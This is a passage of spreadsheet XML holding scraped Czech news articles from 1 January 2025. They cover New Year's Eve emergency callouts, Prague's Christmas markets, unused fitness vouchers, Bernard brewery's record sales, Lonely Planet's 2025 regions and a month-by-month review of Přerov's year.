    <t>20250101_205_3695927050_5f03c050880ae8e16523.html</t>
  </si>
  <si>
    <t>5f03c050880ae8e16523</t>
  </si>
  <si>
    <t>V Plzeňském kraji byly silvestrovské oslavy klidné, uvedli záchranáři</t>
  </si>
  <si>
    <t>V Plzeňském kraji byly silvestrovské oslavy klidné, uvedli záchranáři 1. ledna 2025 11:28 Sdílet článek ilustrační snímek | foto: Metro.cz Silvestrovské a novoroční oslavy hodnotí záchranáři v Plzeňském kraji jako klidnější než v předchozích letech. ČTK to řekla mluvčí Andrea Divišová. Poslední noc roku 2024 se obešla bez těžkých zranění i bez vážných dopravních nehod. "Výjezdy, které byly spojené s vítáním nového roku, nebyly tak závažné a jejich počet čítal kolem dvaceti. Úrazy způsobené zábavní pyrotechnikou jsme zaznamenaly pouze dva, a to lehčího charakteru. Další události typu úrazy v opilosti či napadení, se pohybovaly v jednotkách," popsala Divišová. Silvestrovské oslavy se v Plzeňském kraji obešly bez mimořádných událostí i z pohledu policie. "Během noci jsme přijali množství oznámení, která se týkala zejména případů osob pod vlivem alkoholu," řekla ČTK krajská policejní mluvčí Michaela Raindlová. Hasiči od silvestrovského večera do novoročního rána vyjížděli v Plzeňském kraji podle informací zveřejněných na jejich webových stránkách ke zhruba dvěma desítkám událostí. Nejčastěji se jednalo o hořící odpad v popelnicích a některé výjezdy se týkaly také technické pomoci, jako je otevření bytu nebo záchrana lidí z výtahu. Podle policie se silvestrovská noc v Plzeňském kraji rovněž obešla bez vážné dopravní nehody. Autor: ČTK Témata: Okres Plzeň -město | Aktuální zprávy, články a informace Sdílet článek Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20250101_206_3695367758_d86d6a9c1a5168f58867.html</t>
  </si>
  <si>
    <t>d86d6a9c1a5168f58867</t>
  </si>
  <si>
    <t>Vánoční trhy</t>
  </si>
  <si>
    <t>Vánoční trhy Jiskřivá světýlka, vůně skořice a svařeného vína ve vzduchu, zvuky koled linoucí se náměstím. Od 30. listopadu 2024 do 6. ledna 2025 se Staroměstské a Václavské náměstí promění v zimní pohádku. Čeká vás: • Bohatý kulturní program pro celou rodinu • Lahodné vánoční speciality • Unikátní řemeslné výrobky • Kouzelná atmosféra historického centra • Dětské dílničky Trhy budou otevřeny denně od 10:00 do 22:00. Trhy na malebných pražských náměstích jsou perfektní příležitostí pro setkávání s přáteli, pro společný čas s rodinou a načerpání pravé vánoční nálady. Zapomeňte na stres a shon. Nechte se unést kouzlem Vánoc v jednom z nejkrásnějších měst světa. Prožijte Jedinečné Vánoční trhy v Praze . Autor: Karel Zavadil Autor person Karel Zavadil</t>
  </si>
  <si>
    <t>326</t>
  </si>
  <si>
    <t>20250101_207_3695356677_ba3aa2b2415facdc42bc.html</t>
  </si>
  <si>
    <t>ba3aa2b2415facdc42bc</t>
  </si>
  <si>
    <t>Polovina dárkových poukázek prý propadne. Lidé to vzdají, říká osobní trenér</t>
  </si>
  <si>
    <t>Polovina dárkových poukázek prý propadne. Lidé to vzdají, říká osobní trenér Nový rok je pro mnohé ideální dobou začít s nějakou změnu. Nejčastější novoroční předsevzetí souvisí se zdravím. Jíst zdravěji, začít cvičit, přestat kouřit, omezit alkohol či zhubnout. Mnozí o svém předsevzetí hovořili ještě před Vánoci, pod stromeček tak dostali například permanentku do fitness centra nebo předplacené hodiny s trenérem. A tak jsme se jednoho zeptali, jak to s takovými dárky dopadá. Náš respondent přes den učí na základní škole tělocvik, odpoledne a večer vede skupinové lekce a nabízí také soukromé hodiny jako osobní trenér. Na nedostatek klientů si stěžovat nemůže, jedna hodina u něj vyjde na 900 korun, při koupi balíčku na více hodin se cena snižuje. Stejně jako mnoho dalších trenérů, i on nabízí dárkové poukazy, které jsou zejména před svátky velmi oblíbené. Ti, co si poukazy kupují, se prý dělí na dvě skupiny. „Chodí za mnou blízcí mých klientů, kteří chtějí předplatit nějaké hodiny pro ty, které už trénuji, pak jsou to také ti, kteří vědí o někom, že chce začít, tak jim chtějí zjednodušit start,“ říká redakci. Začátečníky to prý nakopne. Jenže začátečníci prý v mnoha případech poukazy nakonec nevyužijí. „Minulý rok jsem prodal zhruba padesát hodin tréninku, polovina jich propadla,“ krčí rameny. ROZHOVOR: Herec Martin Zounar v rozhovoru pro server PrahaIN.cz bilancuje uplynulý rok, ale také komentuje proměnu svého těla. Na první trénink se prý nováček většinou dostaví, další ale buď zruší, nebo si ho vůbec nenaplánuje. „Ne všichni samozřejmě, zhruba polovina klientů všechny tréninky využije,“ dodává. Letos prodal necelých třicet hodin. Nižší počet je způsoben omezenou kapacitou, zájem byl prý větší. Ptáme se na důvody, proč klienti hodiny nevyčerpají, vysvětlení je prý jednoduché. „Jsou to třeba lidé, kteří nikdy necvičili, dají si se mnou jeden trénink, mají dobrý pocit, baví je to, ale druhý den je všechno bolí, což je zcela normální. Pro tělo je to něco úplně nového, na co nebylo zvyklé, je to pro něj šok. Ale je to odradí,“ říká. Stejné je to i v případě návštěvnosti fitness centra, ve kterém trénuje. V lednu mu na skupinové hodiny chodí desítky nováčků, jejich tváře ale pak postupně mizí a v únoru už jde o jednotlivce. „Jsou to muži, ženy, náctiletí a senioři. Nelze říct, že by chtěly začít cvičit jenom mladé ženy, na hodiny mi chodí i spousta seniorů,“ popisuje. A co by poradil těm, kteří chtějí začít cvičit a dělat něco pro své zdraví? „Vydržet a chodit alespoň dvakrát nebo třikrát týdně. Najděte si parťáka a choďte ze začátku spolu, než se to pro vás stane rutinou. Děláte to pro sebe, ne pro někoho jiného. Tělo vám to vrátí,“ říká. Dále by také poradil určit si dosažitelný cíl a nečekat zázraky hned po první návštěvě. Pro první návštěvu určitě doporučuje zaplatit si osobního trenéra nebo navštívit skupinovou lekci o co nejmenším počtu cvičenců. „Snažit se cvičit u strojů hned první návštěvu, nemá smysl,“ uzavírá. Autor: Bára Richterová Autor person Bára Richterová</t>
  </si>
  <si>
    <t>20250101_208_3695340170_95bb6f2693afcaacda89.html</t>
  </si>
  <si>
    <t>95bb6f2693afcaacda89</t>
  </si>
  <si>
    <t>Plné ruce práce měli na Silvestra opět záchranáři a policisté napříč Českem</t>
  </si>
  <si>
    <t>Plné ruce práce měli na Silvestra opět záchranáři a policisté napříč Českem Kontakty Reklama Vyhledávání dobrovolní hasiči HZS Jihočeský Jihomoravský Karlovarský Královehradecký Krimi Liberecký LZS Městská policie Moravskoslezský Olomoucký Pardubický Plzeňský Policie Pomáháme Praha Sbor dobrovolných hasičů Složky IZS Středočeský stroj Technika Ústecký Vysočina Z domova Zajímavosti Zdravotnictví Zlínský Zprávy podle krajů ZZS Plné ruce práce měli na Silvestra opět záchranáři a policisté napříč Českem ČESKO – Plné ruce práce měli na Silvestra opět záchranáři a policisté napříč Českem. Bujaré oslavy skončily pro některé oslavující bohužel i tentokrát těžkým zraněním a popáleninami od odpálené silvestrovské pyrotechniky. Během silvestrovské noci vyjeli záchranáři v Praze k celkem 348 případům. Přímo v souvislosti s novoročními oslavami záchranná služba zasahovala u 100 událostí, přičemž v 9 případech šlo o zranění způsobená zábavní pyrotechnikou. Ve speciálu GOLEM bylo ošetřeno celkem 27 pacientů, z nichž 13 bylo transportováno do zdravotnického zařízení. Nejzávažnější případ představoval úraz hlavy, který si vyžádal napojení pacienta na umělou plicní ventilaci a následný transport do traumacentra. V Ústeckém kraji záchranáři zasahovali hned u několika případů, kdy silvestrovská pyrotechnika způsobila desítkám lidí amputace rukou či článků prstů. Desetkrát záchranáři vyjížděli k závažným případům a popáleninám. Rušno bylo také v Moravskoslezském kraji : V posledních čtyřiadvaceti hodinách vyjížděly posádky ZZS MSK (od rána 31.12.2024 do šesté ranní 1.1.2025) celkem ve více než čtyř stech případech. Jen od silvestrovské půlnoci do dnešního rána přitom záchranáři ošetřovali 111 pacientů. Nárůst zásahů v těchto hodinách byl více než dvojnásobný oproti běžným nocím. Během novoročních oslav zasahovali záchranáři ZZS MSK u osmi událostí vzniklých při odpalování zábavní pyrotechniky. Jednalo se vesměs o lehká nebo středně těžká poranění hlavy nebo končetiny. Od půlnoci do ranních hodin 1. ledna bylo nutno ošetřovat přes pět desítek zraněných. Mezi úrazy dominovaly pády se zraněními hlavy či končetin a řezná poranění od skla. Polovina zraněných během silvestrovské noci byla pod zjevným vlivem alkoholu , což je obdobný počet, jako v uplynulých letech. Další zhruba tři desítky ošetřovaných osob posádkám ZZS uvedly, že byly napadeny a zraněny jinou osobou, nebo utrpěly poranění při potyčkách. Také většina z nich jevila známky ovlivnění psychotropní látkou. Mezi mechanismy napadení patřily údery lahvemi, tyčemi a dalšími předměty. „S diagnózou opilosti či těžké opilosti muselo být v našem kraji záchrannou službou během silvestrovského večera a noci ošetřeno šestnáct osob,“ dodává mluvčí ZZS Moravskoslezského kraje PhDr. Lukáš Humpl. V Libereckém kraji záchranáři evidují 260 výjezdů. Záchranáři také ošetřili sedm lidí s úrazy po odpalování petard, ale také zranění po napadení či intoxikací alkoholem . V Královéhradeckém kraji záchranáři ošetřili pouze tři drobná poranění od silvestrovské pyrotechniky. Autor: redakce a ZZS Autor: Jan Vraný Autor person Jan Vraný Rubrika transition_slide dobrovolní hasiči</t>
  </si>
  <si>
    <t>427</t>
  </si>
  <si>
    <t>20250101_209_3695366936_36ec372bde8b20bedd65.html</t>
  </si>
  <si>
    <t>36ec372bde8b20bedd65</t>
  </si>
  <si>
    <t>Obliba piva Bernard roste. Prodalo se ho nejvíce v historii</t>
  </si>
  <si>
    <t>Obliba piva Bernard roste. Prodalo se ho nejvíce v historii 1. 1. 2025 Rodinný pivovar Bernard v roce 2024 vystavil 419 tisíc hektolitrů piva , nejvíce za 33 let existence. Je to o 10 tisíc hl více než v předchozím roce. Produkce pivovaru jde proti vývoji na trhu, kde prodej piva dlouhodobě postupně klesá. Dvě třetiny piva Bernard vyčepují restaurace a hospody ze sudů, třetina se prodá v lahvích, přitom na českém trhu je poměr opačný. „ Každý rok se vypořádáváme s dalšími překážkami, od covidu přes skokové nárůsty cen energií a surovin, válku na Ukrajině , zvýšení daní, nekončící bujení administrativy až po povodně, jejichž dopad jsme také pocítili. Přesto se nám daří růst. Nemáme to zadarmo, je za tím píle a poctivá práce. Proto nás opravdu těší, že si naše pivo vybírá stále více lidí,“ hodnotí vývoj generální ředitel a vrchní sládek Josef Vávra . Josef Vávra a Stanislav Bernard „ Od počátku usilujeme o co nejvyšší kvalitu piva a služeb a naše snaha přináší výsledky. Věřím v poctivou práci a dobré vztahy s obchodními partery a zákazníky. Má smysl jít vlastní cestou v marketingu a mít schopné obchodníky, kterým se daří nacházet nová odbytiště, i když řada provozoven v posledních letech padla,“ ohlíží se za uplynulým rokem také spolumajitel pivovaru Stanislav Bernard , podle kterého se aktuálními výsledky pivovar přiblížil na hranu svých kapacit. Růst pozastavil pouze covid Výstav Rodinného pivovaru Bernard se kontinuálně zvyšuje od roku 2001 (95 tisíc hl.). Hranici 400 tisíc hektolitrů se mu podařilo přesáhnout poprvé v roce 2019, v následujících letech ovšem přišel pokles prodeje v důsledku opatření proti šíření covidu (zavírání hospod apod.). V roce 2022 byl výstav pivovaru bezmála 398 tisíc hektolitrů, v roce 2023 už 409 tisíc hektolitrů piva . Bernard Malthouse Rodinný pivovar Bernard sídlící v Humpolci na Vysočině exportuje 21 procent své produkce do 25 zemí světa, nejvíce na Slovensko , do Švédska a do Bulharska . Zaměstnává 267 lidí, dalších 28 osob má práci v humnové Sladovně Bernard v Rajhradě u Brna . V roce 2022 pivovar otevřel ve svém areálu Návštěvnické centrum Bernard . V roce 2024 se v soutěži Společnosti přátel piva stal už poosmé pivovarem roku. Navigace pro příspěvek Počasí Nejnovější příspěvky TRAILER FILMU ČERNÁK NAZNAČUJE, ŽE TO BUDE DRSNÉ Martin Šoltys už je po první etapě maratonské výzvy pátý, Aliyyah Koloc po skvělém startu zpomalil oheň Kaskádu pěti vodních nádrží obnovují na Křivoklátsku Lesy České republiky Josef Klíma míří na TV Barrandov s novým pořadem Zoo Praha si připomíná 100 let od narození Geralda Durella. Známý spisovatel a přírodovědec se Zasadil o záchranu holubů růžových, které pražská zoo úspěšně odchovává. Archivy Autor: Petr Brodecký Autor person Petr Brodecký</t>
  </si>
  <si>
    <t>147</t>
  </si>
  <si>
    <t>20250101_21_3697967038_b8761c95b4a4a9c22d49.html</t>
  </si>
  <si>
    <t>b8761c95b4a4a9c22d49</t>
  </si>
  <si>
    <t>Best in Travel: Regiony, které navštívit v roce 2025 podle Lonely Planet</t>
  </si>
  <si>
    <t>Shrnutí Best in Travel: Regiony, které navštívit v roce 2025 podle Lonely Planet Nakladatelství Lonely Planet, které vydává průvodce již 50 let a je překládáno do 11 jazyků, doporučuje opět výběr těch nejzajímavějších a neopomenutelných destinací v nadcházejícím roce. Tyto žebříčky vycházejí z různých kritérií od udržitelnosti a inovací až po kulturu a dobrodružství, s cílem inspirovat cestovatele k objevování nových destinací. Best in Travel: Země, které navštívit v roce 2025 podle Lonely Planet Lowcountry ( Jižní Karolína a Georgia) Tato oblast rozkládající se mezi Jižní Karolínou a Georgií je známá svými zlatavými plážemi, bažinami a historickými městy. Pod zdánlivým klidem se Lowcountry stalo centrem inovací v oblasti udržitelné energie a získalo si uznání díky své kulinářské scéně. Nedávno otevřené Afroamerické muzeum zde patří k nejlepším v zemi a je svědkem důležité společenské reflexe. Terai Terai na jihu Nepálu představuje méně známou stránku slavných himálajských hor. V této rozsáhlé oblasti lesů, pastvin a mokřadů se soustřeďuje biologická rozmanitost, žijí zde nosorožci a četné druhy ptáků. Je kulturně bohatá, nachází se zde buddhistické a hinduistické památky velkého významu a dosud málo navštěvované oblasti pěstování čaje, které nabízejí klidnou alternativu k přeplněným místům. Chiriquí Provincie Chiriquí v západní Panamě není nejznámější panamskou destinací. Nabízí však širokou škálu přírodních zajímavostí, včetně oblačných lesů, kávových plantáží, sopek a mořského parku v Tichém oceánu . Pozorovatelé ptáků mohou obdivovat více než tisíc druhů, včetně posvátného quetzala. Launceston a Tamar Valley Launceston, druhé největší město Tasmánie , vyniká svou nabídkou jídla a vína , neboť je obklopen sopečnými pláněmi a vyhlášenými vinařskými údolími. Ve městě se snoubí kultura s přírodou, majestátní soutěska Cataract Gorge se táhne až do centra města a je obklopena vynikajícími restauracemi a vinárnami. Valais Švýcarsko se svým kantonem Valais v sobě spojuje přírodní krásy a udržitelnost. Tento region je proslulý nejen Matterhornem a lyžařskými středisky Zermatt a Verbier , ale také zelenými projekty, které slibují stále ekologičtější budoucnost. A dokonalou kombinací půvabu a pastýřské tradice. Giresun a Ordu Giresun a Ordu, které se nacházejí na tureckém pobřeží Černého moře, jsou malá města obklopená úchvatnou zelenou krajinou. Tato města s mírnými teplotami, klidnými plážemi a úchvatnými náhorními plošinami nabízejí také jedinečnou místní gastronomii a vřelé přijetí. Bavorsko Bavorsko je regionem kontrastů: na jedné straně modernost a pokrok, na straně druhé úcta k tradicím. Od lesů po zasněžené hory, od typických vesnic po moderní architekturu Mnichova , Bavorsko je také v čele ekologické udržitelnosti. Východní Anglie Východní Anglie , zahrnující Suffolk , Norfolk , Essex a Cambridgeshire , si zachovává autentičnost minulosti s historickými vesnicemi, nedotčenými plážemi a ptačími rezervacemi. Přestože jsou některé lokality velmi rušné, region stále nabízí zákoutí klidu a nadčasového kouzla. Jordan Trail Jordánská stezka, která slaví své desáté výročí v roce 2025, je ideální cestou k objevování Jordánska , země, která spojuje krásu pouště a starověkých ztracených měst s jedinečným zážitkem z trekingu. Tisíciletá historie Petry a neuvěřitelná krajina Vádí Rum činí z této destinace nutnost pro každého cestovatele. Mount Hood a kaňon Columbia River Gorge Pro milovníky pěší turistiky a dobrého vína je oblast Mount Hood ideální destinací. Tato oblast amerického Severozápadu se nachází pouhých 40 minut od Portlandu , oregonského města proslulého svou gastronomií, a nabízí tak dokonalou kombinaci outdoorového dobrodružství a kulinářských zážitků. Kromě toho, že je tento region proslulý svými stezkami vedoucími k nádherným vodopádům, se zde vytvořila dynamická komunita, do níž inovativní a udržitelná kuchyně láká stále více návštěvníků, a je tak ideálním doplňkem outdoorových aktivit, které proslavily vulkán Hood.</t>
  </si>
  <si>
    <t>59</t>
  </si>
  <si>
    <t>20250101_210_3695368834_bc03c95eefbb4feee772.html</t>
  </si>
  <si>
    <t>bc03c95eefbb4feee772</t>
  </si>
  <si>
    <t>Jaký byl rok 2024 pro Přerov? Podívejte se na přehled toho nejdůležitějšího</t>
  </si>
  <si>
    <t>Jaký byl rok 2024 pro Přerov ? Podívejte se na přehled toho nejdůležitějšího Rok 2024 je za námi a město bilancuje. Jaký byl? Co všechno se povedlo opravit, vylepšit, udělat? Koho zástupci města ocenili a za co? Podívejte se na měsíční přehledy toho nejdůležitějšího ze života Přerova . Leden Než se vydáš k maturitě, udělej dobrý skutek – daruj krev. Tímto heslem byli vyzvání studenti posledních ročníků přerovských středních škol k tomu, aby – než složí zkoušku dospělosti – darovali v přerovské nemocnici tu nejcennější tekutinu. Šlo o společný projekt města a nemocnice. Začala rekonstrukce budovy bývalého EMOSu na náměstí TGM 16. Pětapadesát let starý objekt, stojící v centru města, bude za 22 měsíců od zahájení stavby přebudován na moderní sídlo magistrátu. Jeho architektonickou podobu navrhla společnost Anagram&amp;amp;Gruppa. Úpravy přijdou na přibližně na 360 milionů korun, na přestavbu město získalo dotaci přesahující 167 milionů. První přerovské miminko roku 2024 přišlo na svět v úterý 2. ledna krátce po půl dvanácté dopoledne. Karolínka Dočkalová vážila po narození 2 976 gramů a měřila 49 centimetrů. Mamince v porodnici osobně popřáli i zástupci města, kteří jako dar přinesli hrací deku s hvězdičkami. Rekordní výtěžek se podařilo vybrat v průběhu celorepublikové Tříkrálové sbírky – obyvatelé Přerova a jeho místních částí přispěli koledníkům do kasiček celkem 342 tisíc 664 korun, tedy o více než 60 tisíc víc než v předchozím roce. Za úspěchem stál nový systém koledování i větší počet dobrovolníků. Koledníci navštívili i přerovskou radnici. Únor Přerovem prošel veselý masopustní průvod. Do ulic se spolu s vodníkem, medvědem, vysloužilým vojákem, cikánkou, stárkem a dalšími maškarami vydaly stovky lidí. Patnáctiletou tradici zpestřila jedna novinka – prodejní trhy na Masarykově náměstí. Na radnici čekalo na příchozí občerstvení v podobě koláčků a starorežné. Tradiční veselici – Šibřinky – zorganizovali pracovníci Domova pro seniory. Jejich klienti se na akci, kterou navštívili i zástupci města, bavili, nezapomněli ani na masky. K tanci a poslechu jim zahrála kapela Tučeňáci. Úředníci magistrátu budou sídlit nejen v budově bývalého EMOSu, ale také ve vedlejším objektu TGM 18 – rozhodli o tom zastupitelé na svém únorovém jednání. Město za nemovitost zaplatilo 13 milionů korun. V suterénu budovy z roku 1970 je původní pivnice s tanečním prostorem se sociálním a technickým zázemím. V prvním nadzemním podlaží je restaurace s kuchyní, sklady, vstup na venkovní terasu, ve druhém je kulečníková herna, sociální zázemí, kotelna s plynovým kotlem a lodžiová terasa, na kterou navazuje točité kovové požární schodiště. Začala rekonstrukce veřejných toalet v těsné blízkosti brány do parku Michalov u bistra U Králíčka. Výměny se dočkala elektroninstalace, vodoinstalace a kanalizace. Stěny dostaly nové obklady, na zem byla položena nová dlažba, namontována byla i nová bílá technika a dveře. Stavební práce přišly město na 683 tisíc korun. Březen Farmářské trhy se kvůli rekonstrukci budovy TGM 16, kterou provázel hluk a prach, přesunuly na Horní náměstí. Na nové tržní místo si ale Přerované nezvykli, pro prodejce byly trhy prodělečné, a tak se květnové zcela zrušily. Na náměstí před radnicí se měly vrátit zpátky po prázdninové pauze, ale kvůli vytrvalým dešťům se nakonec konaly až v říjnu. Kraslicovník a ozdobené břízky na náměstí, dekorace v podobě obřích vajíček osázených květy, fotokoutek s rámečky a záhony rozkvetlých cibulovin po celém městě – Přerov se s příchodem jara oděl do jarního. Nechyběly ani tradiční akce – vynášení smrtky, Velikonoční salon na Atlasce, chození s hrkači či historický jarmark. S jarem přišla ke slovu také oprava parkovišť, která město přišla na miliony korun. Rekonstrukce se postupně dočkaly parkovací plochy v Jižní čtvrti IV, v ulicích Interbrigadistů a Jasínkova. Dokončeny byly i stavební práce na parkovišti v Kratochvílově ulici , které musely být přerušeny kvůli nepřízni počasí. Dva a půl tisíce odpadových nádob v Přerově a jeho místních částech prošlo výměnou – všechny plechové o objemu 110 litrů, stojící u rodinných domů, byly postupně nahrazeny stodvacetilitrovými plastovými. Důvodem bylo čipování – čip totiž není možné umístit do plechu. Technické služby využívají nový systém k lepší evidenci výsypů a efektivnějšímu plánování tras. Duben Senior taxi, které za dvacetikorunu vozí přerovské občany nad 65 let k lékařům či na úřady, oslavilo sedm let. A protože byl o tuto dotovanou službu velký zájem, pořídilo město další auto a nabídku rozšířilo. Kromě lékařů a úřadu se Přerované dostanou i k nádraží. Služba je omezena na maximálně šest jízd v měsíci na jednoho seniora. Developerská společnost RC Europe plánuje v lokalitě mezi bývalými Přerovskými strojírnami a Henčlovem vybudovat moderní průmyslovou a logistickou zónu. Investice za tři miliardy korun má přinést až dva a půl tisíce nových pracovních míst. Zastupitelé jejich záměr podpořili prodejem pozemků, na kterých budou stát výrobní haly. Město se společností podepsalo smlouvu o smlouvě budoucí na jejich prodej. Peníze za 37 tisíc metrů čtverečních pozemků společnost zaplatí poté, co na svůj projekt dostane platné stavební povolení. V souladu se znaleckým posudkem zaplatí 1340 korun za metr čtvereční. Horní náměstí se na konci dubna vrátilo o desítky let zpátky v čase. Davy obdivovatelů si zde mohly prohlédnout přibližně stovku historických vozidel vyrobených do roku 1945, která se poté vydala na přibližně 70 kilometrů dlouhou spanilou jízdu hanáckou krajinou a podhůřím Hostýnských vrchů. Cíl strojů byl na hradě Helfštýn . Pořadatelem tradiční akce byl Oldtimer Club Helfštýn . Tenistka Linda Nosková převzala v Městském domě z rukou primátora Petra Vrány cenu za vítězství v hlavní kategorii dospělých jednotlivců ankety Nejúspěšnější sportovec města Přerova za rok 2023. Bílý sport přitom slavnostnímu udílení dominoval. Koučem roku se stal trenér úspěšné přerovské tenistky Tomáš Krupa, mezi mládežnickými jednotlivci triumfoval vítěz juniorského Davis Cupu Martin Doskočil. Premiérovou Cenu primátora města Přerova převzal přerovský tenisový nestor Petr Huťka starší. Úspěch si připsaly i posádky lodí Dragon Force – první místo získaly mezi dospělými i juniorské týmy. Květen Dobovou módní přehlídkou a vernisáží exteriérové výstavy oficiálně odstartovaly oslavy 120. výročí městského parku Michalov. Kulturní program trval až do podzimu a zapojila se do něj celá řada organizátorů. Přerované mohli narozeniny parku oslavit návštěvou koncertů, přednášek, muzea i letního kina. Nechybělo tvoření či komentované procházky Michalovem. Nová dešťová zahrada, jejíž součástí jsou také herní vodní prvky pro děti, mlžítka, květiny, stromy a lavičky, slouží od poloviny května veřejnosti. Lidé ji najdou v blízkosti sídliště v Sokolské ulici. Jejím smyslem je ochladit celý prostor a přispět ke zlepšení mikroklimatických podmínek v této lokalitě. Součástí projektu, na který město Přerov získalo významnou dotaci z Norských fondů, bylo také omlazení přestárlé aleje v ulici Na Hrázi. Cyklističtí fanoušci měli svátek – v Přerově začínala druhá česká etapa prestižního závodu Orlen Nations Grand Prix vedoucí na beskydskou Kohútku. 110 kilometrů dlouhou trasu odstartoval v pravé poledne primátor Petr Vrána. Pro ženy a muže ve věkové kategorii šedesát plus uspořádalo město Přerov Sportovní den seniorů. Soutěžilo se v pětičlenných smíšených družstvech – v každém z nich musely být minimálně dvě ženy. Účastníci změřili své síly v devíti disciplínách – čekala je střelba na branku, štafetová jízda na koloběžce, hod kroužků na kužel, běh s míčkem na tenisové raketě, hod šipkami do terče, hod na koš, pétanque, hod pytlíkem na cíl a střelba z laserové pistole na terč. Tři vítězné týmy pak reprezentovaly Přerov na Krajských sportovních hrách. Červen Přerov hledá moderní lego – vzejít by mělo z designérské soutěže pořádané organizací Czechdesign . Prvky nového vizuálního stylu by se měly kromě oficiální korespondence města stát například i součástí nové budovy magistrátu, která se právě rekonstruuje na náměstí TGM . Logo bude na plakátech, reklamních předmětech, graficky zvýrazní Přerovské listy. Proměnou projdou webové stránky města a postupně se nový grafický prvek, reprezentující město Přerov , promítne například i do navigačního systému magistrátních budov či uličních informačních směrovek. Nebuď lama, flexi s přilbou – to je název dopravně bezpečnostní akce, kterou pro školáky připravilo město Přerov . V programu nechyběla beseda s preventisty Městské policie Lenkou Škodovou a Pavlem Vojtáškem o používání cyklistické helmy a dalších bezpečnostních prvků. Zájemci si mohli na figurínách také vyzkoušet, jak správně dát první pomoc. Součástí akce byla i výstava, různé kvízy a ukázka bike trialu. Na závěr se děti mohly setkat s desetinásobným mistrem světa v jízdě na vysokém kole Josefem Zimovčákem , který Přerovem projížděl v rámci jeho cyklotour Na kole dětem. Tradiční oslavy Evropského dne hudby nesly podtitul Tentokrát s Kainarem. Součástí bylo odhalení pamětní desky tohoto přerovského básníka i rozmanitý kulturní program v ulicích města. Náměstí Přerovského povstání se na dva dny stalo sportovním srdcem města – uskutečnil se zde Den sportu, na němž se veřejnosti představila více než dvacítka sportovních oddílů a klubů z Přerova a jeho místních částí. Současně se plocha proměnila ve streetbalové hřiště, které se stalo dějištěm oficiálního turnaje Chance 3x3 Tour. Červenec O prázdninách začala na velké Laguně aplikace speciální biologicky odbouratelné bakteriální směsi, která by měla „požrat“ organické bahno. S procesem mělo město pozitivní zkušenost už z minulých let. Město také oslovilo odbornou firmu, která by měla ověřit míru účinnosti bakteriální směsi a její vliv na životní prostředí a současně navrhnout další opatření. Dno Laguny prozkoumával také potápěč. Mobilní letní kino, které město pořídilo v rámci participativního rozpočtu, vstoupilo do druhé sezóny. Každou prázdninovou středu nabídlo divákům zajímavé filmy, které se promítaly pod širým nebem. Čtyři z nich si hlasováním vybrali sami diváci. Hrálo se celkem desetkrát ve třech různých lokalitách – v Michalově, na Laguně a v Předmostí. Bezesporu největší akcí oslav 120. výročí od založení Michalova byl hudební festival Velká Morava. Evu Farnou , Pokáče, Janka Ledeckého či Annu K. si nenechalo ujít přes dva a půl tisíce lidí. Obavy z devastace parku se nepotvrdily, po nastoupení úklidové služby byl celý areál uklizen již po 15 minutách. Festival se uskuteční i letos, a to 12. července. Vstupenky jsou již v prodeji. Pro zpříjemnění prázdnin připravilo město Přerov speciální den s environmentálním podtextem pro všechny generace. P řipraven byl originální interaktivní zábavný program, kterým provázel kamarád Wiki a pan Zmrzlinka. Nechyběly písničky, originální soutěže, zmrzlinové pochoutky, bublinová show a zmrzlinolympiáda. Srpen Třináct kapel, Dalího výstava, historický jarmark, mše svaté i ruské kolo – to je stručné shrnutí loňských Přerovských svatovavřineckých hodů. Do oslav šla částka 2 miliony 200 tisíc korun z rozpočtu města a z dotací z kraje. Zlatým hřebem kulturní části programu byl koncert držitelky dvou Českých slavíků a čtyř cen Anděl Anety Langerové . Na hodovou sobotu přichystali pracovníci magistrátu nevšední akci – společnou komunitní snídani. Přerované mohli společně posnídat na hradbách. Kdokoli mohl přijít, přinést cokoli dobrého, co uvařil, napekl či koupil. Celkovou atmosféru zpříjemnil známý přerovský muzikant Zdeněk „Dandy“ Slivečka se svým saxofonem. Akce měla navíc charitativní podtext – pro organizaci Za sklem se podařilo vybrat 8 345 korun. Oprava silnice uzavřela na dva týdny část frekventovaného nábřeží Dr. Edvarda Beneše . Do rekonstrukce celkem 2 415 metrů čtverečních město investovalo 2 miliony 728 tisíc korun. V místě byla obnovena živičná vrstva, současně byly odstraněny i stávající betonové panely na autobusové zastávce či opraveny obrubníky. V trávě vyšlapaná pěšinka, která vedla z Komenského na Kratochvílovu ulici , dostala oficiální podobu. Lidé si tudy zkracovali cestu od Gymnázia Jakuba Škody k bance či jídelně. Zástupci města se rozhodli, že nebudou převychovávat chodce poučením, že se „po trávě nechodí“, ale v místě raději udělali nový chodník. Opravy se dočkal i stávající chodník, provedeny byly sadové úpravy, místo zkrášlily kameny. Září Protáhnout tělo chůzí, během či cvičením. Trénovat na čerstvém vzduchu a zdravě se zabavit. Užít si aktivní odpočinek. To všechno nabídla Přerovanům nová Fit stezka, kterou město nechalo vybudovat v okolí Bečvy a velké Laguny. Na sedmi stanovištích bylo umístěno devět venkovních cvičebních prvků s návody na správné užívání. Stezka, kterou vybrali občané v rámci participativního rozpočtu, přišla na 490 tisíc korun. První kameny zmizelých, které jsou připomínkou tragického osudu členů rodiny Arely, byly odhaleny v centru města. V říjnu byly uloženy kameny dalších devíti obětí nacismu – Pavla, Zdeňka a Jiřího Wolfových, Flory Wolfové Haasové, Ericha Haase, Otto a Alice Kleinových, Emila Tauského a Antonína Michálka . V rámci projektu participativního rozpočtu bylo vyrobeno celkem 23 kamenů – zbývajících devět bude uloženo letos v květnu. Téměř celou Českou republiku ohrožovaly povodně, ani Přerov nebyl výjimkou. Před velkou vodou město nakonec ochránila protipovodňová opatření – zděné zídky kolem toku Bečvy , retenční nádrže u mostů, mobilní hrazení i pytle s pískem. Hladina řeky vystoupala v Dluhonicích až na 684 centimetrů. Do obydlených částí se voda nevylila, zaplavila ale zahrádkářské kolonie pod nemocnicí, okolí Laguny a garáže u Prechezy. První zářijovou sobotu se návštěvníci Michalova vrátili zpět do historie – tentokráte už ne do období první republiky jako v květnu při zahájení oslav výročí parku, ale ještě dál – tentokrát až do středověku. Konal se zde rytířský festival Ve jménu krále. Program odstartoval na náměstí TGM , odkud se historický průvod vydal do Michalova. Diváci mohli vidět opravdové rytířské souboje na kolbišti, ohňovou show, vystoupení šermířů, kaskadérů na koni, španělskou jezdeckou školu, kejklíře i tanečnice a poslechnout si dobovou muziku. Nechyběl ani historický jarmark, ukázky dobových řemesel a středověké kuchyně. Říjen Přerovské náměstí rozzářily desítky dýní – konal se zde už druhý ročník Přerovského dýňování. Na děti čekala strašidelná stezka s plněním úkolů, pro zpestření si zájemci mohli nechat namalovat na obličej dýňové motivy a ve výtvarných dílničkách si vlastníma 